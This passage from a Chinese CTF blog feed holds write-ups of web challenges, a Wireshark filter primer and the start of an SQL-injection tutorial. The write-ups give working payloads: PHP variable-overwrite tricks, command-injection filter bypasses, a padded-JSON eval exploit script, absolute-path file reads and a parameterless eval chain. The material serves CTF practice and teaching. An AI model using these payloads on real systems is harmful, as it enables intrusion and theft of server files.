 $$key = $$value;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">echo &#x27;the flag is : &#x27; . $flag;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>第一层校验（必须传 flag 参数）</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>]) &amp;&amp; !<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;flag&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">exit</span>(<span class="variable">$giveme</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>必须传 <code>flag</code> 参数（GET 或 POST）</p><p>第二层校验（不能等于 “flag”）</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;flag&#x27;</span>] === <span class="string">&#x27;flag&#x27;</span> || <span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>] === <span class="string">&#x27;flag&#x27;</span>)&#123;</span><br><span class="line">    <span class="keyword">exit</span>(<span class="variable">$getout</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>不能 <code>flag=flag</code></p><p>关键漏洞点 （变量变量）</p><ol><li>POST 变量覆盖</li></ol><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span> (<span class="variable">$_POST</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>) &#123;</span><br><span class="line">    <span class="variable">$$key</span> = <span class="variable">$value</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>👉 如果你 POST：</p><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag=aaa</span><br></pre></td></tr></table></figure><p>等价于：</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$flag</span> = <span class="string">&#x27;aaa&#x27;</span>;</span><br></pre></td></tr></table></figure><p>2.GET 变量变量 + 二次引用（<strong>致命点</strong>）</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span> (<span class="variable">$_GET</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>) &#123;</span><br><span class="line">    <span class="variable">$$key</span> = <span class="variable">$$value</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>如果你 GET：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?flag=giveme</span><br></pre></td></tr></table></figure><p>那么执行的是：</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$flag</span> = <span class="variable">$giveme</span>;</span><br></pre></td></tr></table></figure><p>而 <code>$giveme</code> 的值是：</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;can can need flag!&#x27;</span></span><br></pre></td></tr></table></figure><p>最终输出分析</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;the flag is : &#x27;</span> . <span class="variable">$flag</span>;</span><br></pre></td></tr></table></figure><p>所以访问：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?flag=giveme</span><br></pre></td></tr></table></figure><p>实际输出是：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">the flag is : can can need flag!</span><br></pre></td></tr></table></figure><p>最终payload：</p><p>两种</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">(1)GET ?a=flag&amp;flag=a</span><br><span class="line"></span><br><span class="line">(2)POST：  flag=a</span><br><span class="line">    GET:   _GET[&#x27;a&#x27;]=flag</span><br></pre></td></tr></table></figure><p>得到flag：NSSCTF{3ff06aab-bca7-4d7c-997b-38634c540d62}</p><h3 id="15fsctf-2023细狗20"><a class="markdownIt-Anchor" href="#15fsctf-2023细狗20"></a> 15.[FSCTF 2023]细狗2.0</h3><p>本题考察RCE,</p><p>我们开始时尝试cat失败后，试着使用<code>;ls</code>成功定向到另一个页面，这时我们为了防止cat过滤直接使用more函数，同时发现存在空格过滤，于是</p><p>构造payload如下：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://node4.anna.nssctf.cn:29987/moyu.php?hongzh0=%3Bmore$&#123;IFS&#125;/f*</span><br></pre></td></tr></table></figure><p>得到flag：NSSCTF{9516ee02-6f9b-4e86-8b5c-171fea603cc4}</p><h3 id="16nisactf-2022babyupload"><a class="markdownIt-Anchor" href="#16nisactf-2022babyupload"></a> 16.[NISACTF 2022]babyupload</h3><p>神奇题目！！！</p><p>一打开环境，正常上传，发现连图片都上传不了QAQ，于是右键查看源码，发现可以访问/source;</p><p>访问后得到app.py文件，代码如下：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><span class="line">from flask import Flask, request, redirect, g, send_from_directory</span><br><span class="line">import sqlite3</span><br><span class="line">import os</span><br><span class="line">import uuid</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line">SCHEMA = &quot;&quot;&quot;CREATE TABLE files (</span><br><span class="line">id text primary key,</span><br><span class="line">path text</span><br><span class="line">);</span><br><span class="line">&quot;&quot;&quot;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def db():</span><br><span class="line">    g_db = getattr(g, &#x27;_database&#x27;, None)</span><br><span class="line">    if g_db is None:</span><br><span class="line">        g_db = g._database = sqlite3.connect(&quot;database.db&quot;)</span><br><span class="line">    return g_db</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.before_first_request</span><br><span class="line">def setup():</span><br><span class="line">    os.remove(&quot;database.db&quot;)</span><br><span class="line">    cur = db().cursor()</span><br><span class="line">    cur.executescript(SCHEMA)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.route(&#x27;/&#x27;)</span><br><span class="line">def hello_world():</span><br><span class="line">    return &quot;&quot;&quot;&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;form action=&quot;/upload&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;</span><br><span class="line">    Select image to upload:</span><br><span class="line">    &lt;input type=&quot;file&quot; name=&quot;file&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;submit&quot; value=&quot;Upload File&quot; name=&quot;submit&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;!-- /source --&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;&quot;&quot;&quot;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.route(&#x27;/source&#x27;)</span><br><span class="line">def source():</span><br><span class="line">    return send_from_directory(directory=&quot;/var/www/html/&quot;, path=&quot;www.zip&quot;, as_attachment=True)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.route(&#x27;/upload&#x27;, methods=[&#x27;POST&#x27;])</span><br><span class="line">def upload():</span><br><span class="line">    if &#x27;file&#x27; not in request.files:</span><br><span class="line">        return redirect(&#x27;/&#x27;)</span><br><span class="line">    file = request.files[&#x27;file&#x27;]</span><br><span class="line">    if &quot;.&quot; in file.filename:</span><br><span class="line">        return &quot;Bad filename!&quot;, 403</span><br><span class="line">    conn = db()</span><br><span class="line">    cur = conn.cursor()</span><br><span class="line">    uid = uuid.uuid4().hex</span><br><span class="line">    try:</span><br><span class="line">        cur.execute(&quot;insert into files (id, path) values (?, ?)&quot;, (uid, file.filename,))</span><br><span class="line">    except sqlite3.IntegrityError:</span><br><span class="line">        return &quot;Duplicate file&quot;</span><br><span class="line">    conn.commit()</span><br><span class="line"></span><br><span class="line">    file.save(&#x27;uploads/&#x27; + file.filename)</span><br><span class="line">    return redirect(&#x27;/file/&#x27; + uid)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.route(&#x27;/file/&lt;id&gt;&#x27;)</span><br><span class="line">def file(id):</span><br><span class="line">    conn = db()</span><br><span class="line">    cur = conn.cursor()</span><br><span class="line">    cur.execute(&quot;select path from files where id=?&quot;, (id,))</span><br><span class="line">    res = cur.fetchone()</span><br><span class="line">    if res is None:</span><br><span class="line">        return &quot;File not found&quot;, 404</span><br><span class="line"></span><br><span class="line">    # print(res[0])</span><br><span class="line"></span><br><span class="line">    with open(os.path.join(&quot;uploads/&quot;, res[0]), &quot;r&quot;) as f:</span><br><span class="line">        return f.read()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">    app.run(host=&#x27;0.0.0.0&#x27;, port=80)</span><br></pre></td></tr></table></figure><p>也是不懂啊，去找了大佬的wp，然后懂了</p><p>os.path.join()函数存在绝对路径拼接漏洞</p><p>os.path.join(path,*paths)函数用于将多个文件路径连接成一个组合的路径。第一个函数通常包含了基础路径，而之后的每个参数被当作组件拼接到基础路径之后。</p><p><strong>然而，这个函数有一个少有人知的特性，如果拼接的某个路径以 / 开头，那么包括基础路径在内的所有前缀路径都将被删除，该路径将视为绝对路径</strong></p><p><em>当上传的文件名为 /flag ，上传后通过uuid访问文件后，查询到的文件名是 /flag ，那么进行路径拼接时，uploads/ 将被删除，读取到的就是根目录下的 flag 文件。</em></p><p>于是用bp抓包改名得到flag。</p><h3 id="17nisactf-2022middlerce"><a class="markdownIt-Anchor" href="#17nisactf-2022middlerce"></a> 17.[NISACTF 2022]middlerce</h3><p>题目：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &quot;check.php&quot;;</span><br><span class="line">if (isset($_REQUEST[&#x27;letter&#x27;]))&#123;</span><br><span class="line">  $txw4ever = $_REQUEST[&#x27;letter&#x27;];</span><br><span class="line">  if (preg_match(&#x27;/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&amp;|!|\&lt;|\&gt;|\&#123;|\x09|\x0a|\[).*$/m&#x27;,$txw4ever))&#123;</span><br><span class="line">    die(&quot;再加把油喔&quot;);</span><br><span class="line">  &#125;</span><br><span class="line">  else&#123;</span><br><span class="line">    $command = json_decode($txw4ever,true)[&#x27;cmd&#x27;];</span><br><span class="line">    checkdata($command);</span><br><span class="line">    @eval($command);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">  highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>攻击代码：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import json</span><br><span class="line"></span><br><span class="line">url = &quot;http://node4.anna.nssctf.cn:20056/&quot;</span><br><span class="line"></span><br><span class="line">payload_dict = &#123;</span><br><span class="line">    &quot;cmd&quot;: &quot;?&gt;&lt;?=`tail /f*`?&gt;&quot;,</span><br><span class="line">    &quot;junk&quot;: &quot;-&quot; * 1000000</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">payload_str = json.dumps(payload_dict)</span><br><span class="line"></span><br><span class="line">data = &#123;</span><br><span class="line">    &#x27;letter&#x27;: payload_str</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">try:</span><br><span class="line">    print(&quot;[+] Sending payload with &#x27;-&#x27; as padding...&quot;)</span><br><span class="line">    response = requests.post(url, data=data)</span><br><span class="line">    print(&quot;[+] Response:&quot;)</span><br><span class="line">    print(response.text)</span><br><span class="line">except Exception as e:</span><br><span class="line">    print(f&quot;[-] Error: &#123;e&#125;&quot;)</span><br></pre></td></tr></table></figure><p>得到flag：NSSCTF{8170e947-d7b7-4e64-8487-7a0e953dac1a}</p><h3 id="18swpuctf-2023-秋季新生赛rce-plus"><a class="markdownIt-Anchor" href="#18swpuctf-2023-秋季新生赛rce-plus"></a> 18.[SWPUCTF 2023 秋季新生赛]RCE-PLUS</h3><p>题目：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">function strCheck($cmd)</span><br><span class="line">&#123;</span><br><span class="line">  if(!preg_match(&quot;/\;|\&amp;|\\$|\x09|\x26|more|less|head|sort|tail|sed|cut|awk|strings|od|php|ping|flag/i&quot;, $cmd))&#123;</span><br><span class="line">    return($cmd);</span><br><span class="line">  &#125;</span><br><span class="line">  else&#123;</span><br><span class="line">    die(&quot;i hate this&quot;);   </span><br><span class="line">   &#125;</span><br><span class="line">&#125;</span><br><span class="line">$cmd=$_GET[&#x27;cmd&#x27;];</span><br><span class="line">strCheck($cmd);</span><br><span class="line">shell_exec($cmd);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>明显存在过滤flag，但是没过滤cat等函数，于是我们采用文件写入的方式构造payload如下：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://node4.anna.nssctf.cn:20156/?cmd=cat /fla* &gt; a.txt</span><br></pre></td></tr></table></figure><p>将cat到的flag写入a.txt文件里，然后访问</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://node4.anna.nssctf.cn:20156/a.txt</span><br></pre></td></tr></table></figure><p>得到flag：NSSCTF{2c4a07e6-f47c-47b4-ba86-94c57de12c48}</p><h3 id="19hnctf-2022-week2canyource"><a class="markdownIt-Anchor" href="#19hnctf-2022-week2canyource"></a> 19.[HNCTF 2022 WEEK2]Canyource</h3><p>本题主要考察了无参RCE</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">if(isset($_GET[&#x27;code&#x27;])&amp;&amp;!preg_match(&#x27;/url|show|high|na|info|dec|oct|pi|log|data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i&#x27;, $_GET[&#x27;code&#x27;]))&#123;</span><br><span class="line">if(&#x27;;&#x27; === preg_replace(&#x27;/[^\W]+\((?R)?\)/&#x27;, &#x27;&#x27;, $_GET[&#x27;code&#x27;])) &#123;  </span><br><span class="line">  eval($_GET[&#x27;code&#x27;]);&#125;</span><br><span class="line">else</span><br><span class="line">  die(&#x27;nonono&#x27;);&#125;</span><br><span class="line">else</span><br><span class="line">  echo(&#x27;please input code&#x27;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/[^\W]+\((?R)?\)/</span><br></pre></td></tr></table></figure><blockquote><p><code>\W</code> 匹配非字母字符</p><p><code>[  ] </code>不匹配内部的字符</p><p><code>[^\W]</code> 匹配字母（负负得正）</p><p><code>[^\W]+</code> 匹配一个至多个字母</p><p><code>\((?R)?\)</code> 匹配括号，括号中允许有这个当前这个表达式（递归）</p></blockquote><p>这题的正则表达式就是只允许我们使用函数，不允许我们为函数传递参数</p><p>核心：当无法直接传递参数时，利用PHP函数从<strong>当前环境</strong>（<code>$_GET</code>、请求头、系统配置）中动态获取数据，构造出一条<strong>纯函数调用链</strong>，最终实现任意代码执行或文件读取。</p><p>构造payload：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=eval(end(current(get_defined_vars())));&amp;cmd=system(&#x27;more f*&#x27;);</span><br></pre></td></tr></table></figure><p>得到flag：NSSCTF{61568bf9-4236-4307-b95a-b8ac56a6278c}</p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2026/01/31/%E7%AE%80%E5%8D%95%E9%A2%98writeup/</id>
    <link href="https://cl1ck-t0.github.io/2026/01/31/%E7%AE%80%E5%8D%95%E9%A2%98writeup/"/>
    <published>2026-01-31T10:19:14.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>简单题writeup</title>
    <updated>2026-03-26T15:51:30.279Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="wireshark" scheme="https://cl1ck-t0.github.io/tags/wireshark/"/>
    <category term="misc" scheme="https://cl1ck-t0.github.io/tags/misc/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="流量分析"><a class="markdownIt-Anchor" href="#流量分析"></a> 流量分析</h1><h2 id="前言"><a class="markdownIt-Anchor" href="#前言"></a> 前言</h2><p>流量分析在misc赛题中<s>常常出现</s>，个人认为<s>有点意思</s>，遂写以下个人总结()</p><p>eg.   buuctf ——wireshark,被嗅探的流量(比较基础)</p><p>​        2025 RCTF ——Shadows of Asgard</p><p>由于个人水平有限，属于新手，出现错误请见谅()后续会不断完善~~(如果记得的话)~~</p><h2 id="一定义"><a class="markdownIt-Anchor" href="#一定义"></a> 一.定义：</h2><p>流量分析（Traffic Analysis）是指对网络流量数据进行分析和解释，以获得有关网络中通信的信息和情报。这种技术可以用于网络安全、网络管理和网络优化等领域。</p><p>网络流量包含了许多有关网络通信的细节信息，如源IP地址、目标IP地址、端口号、协议类型、数据包大小、传输速率等等。通过对这些信息进行分析和解释，可以获得对网络通信的深入理解，并发现潜在的问题和威胁。需要了解网络协议、数据包分析、安全攻防技术等相关知识。此外，还需要使用专业的流量分析工具，如Wireshark、tcpdump、Snort等等，以捕获和分析网络流量数据。在网络安全领域，流量分析被广泛应用于入侵检测、网络监控、漏洞分析等方面。例如，通过对网络流量进行分析和解释，可以发现恶意软件、网络钓鱼攻击、DDoS攻击等各种网络威胁，并采取相应的防御措施。</p><p>在这里我用wireshark进行说明~~(骗你的，只用过wireshark)~~</p><h2 id="二wireshark"><a class="markdownIt-Anchor" href="#二wireshark"></a> 二.wireshark</h2><p>首先我们要先理解wireshark的基本作用和使用方法：</p><p>1.wireshark提供了三个主要面板，包括：</p><p>抓包面板（Capture Panel）：抓包面板用于捕获网络数据包，并显示已经捕获的数据包列表。在该面板中，可以选择捕获的网络接口、设置捕获过滤器、启动和停止抓包等操作。此外，还可以通过右键单击数据包，查看详细信息、导出数据包、跟踪TCP流等。</p><p>数据包列表面板（Packet List Panel）：数据包列表面板显示已经捕获的数据包列表，其中每个数据包占据一行，并列出了有关该数据包的一些关键信息，如时间戳、源IP地址、目标IP地址、协议类型、数据包长度等。此外，还可以通过对列表进行排序、筛选、搜索等操作，方便用户查找和分析数据包。</p><p>数据包详情面板（Packet Detail Panel）：数据包详情面板显示选定数据包的详细信息，包括各个协议层的数据结构和字段值。用户可以通过展开不同的节点，查看不同的协议头和数据负载，帮助用户深入理解数据包的内容和意义。</p><h3 id="常用语法"><a class="markdownIt-Anchor" href="#常用语法"></a> 常用语法</h3><p>（在搜索框输入http即可看http的流量）</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">tcp：显示所有TCP协议的数据包</span><br><span class="line">udp：显示所有UDP协议的数据包</span><br><span class="line">http：显示所有HTTP协议的数据包</span><br><span class="line">dns：显示所有DNS协议的数据包</span><br><span class="line">icmp：显示所有ICMP协议的数据包</span><br></pre></td></tr></table></figure><p>ip地址筛选：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ip.addr == 192.168.0.1：显示与指定IP地址相关的所有数据包</span><br><span class="line">ip.src == 192.168.0.1 ：显示源IP地址为指定地址的数据包</span><br><span class="line">ip.dst == 192.168.0.2：显示目标IP地址为指定地址的数据包</span><br></pre></td></tr></table></figure><p>端口筛选：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">tcp.port ==  80：显示使用指定TCP端口的数据包</span><br><span class="line">udp.port == 53：显示使用指定UDP端口的数据包</span><br></pre></td></tr></table></figure><p>比较运算符：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">==：等于，例如：http.request.method == &quot;POST&quot;   (重要)</span><br><span class="line">!=：不等于，例如：ip.addr != 192.168.0.1</span><br><span class="line">&lt;、&gt;：小于、大于，例如：frame.len &gt; 100 或 frame.len &lt; 50，可以指定过滤数据包长度</span><br></pre></td></tr></table></figure><p>数据包内容过滤规则:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http.request.method == &quot;GET&quot; 或 tcp.flags.syn == 1，可以通过指定数据包内容，只保留符合条件的数据包。</span><br></pre></td></tr></table></figure><p>复杂筛选：</p><p>eg.</p><blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip.src == 192.168.0.1 and tcp.port == 80</span><br></pre></td></tr></table></figure></blockquote><p>这个表达式的作用是：选择源IP地址为192.168.0.1并且目标TCP端口为80的网络流量。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) &amp;&amp; http.request.method==POST </span><br></pre></td></tr></table></figure><p>这个表达式的作用是：选择源IP地址为192.168.1.8或202.1.1.2，并且HTTP请求方法为POST的网络流量。</p><h2 id="三基本应用"><a class="markdownIt-Anchor" href="#三基本应用"></a> 三.基本应用</h2><p>由于个人也没怎么用过wireshark，所以这里只介绍一部分最简单的应用事例：</p><p>eg1.buuctf-misc-easycap</p><p>这里是最简单的应用了，页面多为tcp流便可直接跟踪tcp流获得flag。</p><p>如下图：</p><p><img src="C:/Users/%E9%99%88%E6%98%8E%E6%99%BA/AppData/Roaming/Typora/typora-user-images/image-20260110150609275.png" alt="image-20260110150609275" /></p><p>eg2.2025 RCTF ——Shadows of Asgard</p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2025/12/30/%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/</id>
    <link href="https://cl1ck-t0.github.io/2025/12/30/%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/"/>
    <published>2025-12-30T15:22:26.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>流量分析</title>
    <updated>2026-02-18T12:25:30.855Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="web漏洞" scheme="https://cl1ck-t0.github.io/tags/web%E6%BC%8F%E6%B4%9E/"/>
    <category term="SQL注入" scheme="https://cl1ck-t0.github.io/tags/SQL%E6%B3%A8%E5%85%A5/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="sql注入"><a class="markdownIt-Anchor" href="#sql注入"></a> SQL注入</h1><h2 id="一前言"><a class="markdownIt-Anchor" href="#一前言"></a> 一.前言</h2><p>SQL注入（SQL Injection）是一种常见的Web安全漏洞，形成的主要原因是web应用程序在接收相关数据参数时未做好过滤，将其直接带入到数据库中查询，导致攻击者可以拼接执行构造的SQL语句。那什么是SQL了？结构化查询语言（Structured Query Language，缩写：SQL），是一种关系型数据库查询的标准编程语言，用于存取数据以及查询、更新、删除和管理关系型数据库（即SQL是一种数据库查询语言）</p><p><strong>注入产生的原因是后台服务器在接收相关参数时未做好过滤直接带入到数据库中查询，导致可以拼接执行构造的SQL语句</strong></p><p><em>SQL注入漏洞的本质为数据库层面的RCE</em></p><h2 id="二对于sql注入漏洞的挖掘"><a class="markdownIt-Anchor" href="#二对于sql注入漏洞的挖掘"></a> 二.对于SQL注入漏洞的挖掘</h2><p>由于现代浏览器比较完善，几乎不可能存在sql注入点（），因此以下所述均为做题中的体会（纯入门心得，有点问题请见谅doge）</p><h3 id="1可能的注入点"><a class="markdownIt-Anchor" href="#1可能的注入点"></a> 1.可能的注入点</h3><p>1). 搜索框，登录界面等，这些地方肯定是与数据库有数据交互的，所以我们可以优先观察存在传值或者查询的地方。</p><p>eg.buuctf 极客大挑战2019 EasySQL</p><p>2). 当没有明显搜索框等明显交互位置时，并不代表不存在sql漏洞，这时可以通过url进行传参。</p><p>eg.buuctf 极客大挑战2019 loveSQL &amp;&amp;Knife(后者虽然通常使用蚁剑来秒杀但是也可以用HackBar当成SQL做同样很快)</p><h3 id="2漏洞检测"><a class="markdownIt-Anchor" href="#2漏洞检测"></a> 2.漏洞检测</h3><p>1.get型</p><p>进行url编码</p><p>如果是在burp中测试payload需要先进行url编码，浏览器中则不需要;</p><p>不进行编码的话，也可以用+代替空格，#代替–+ 。 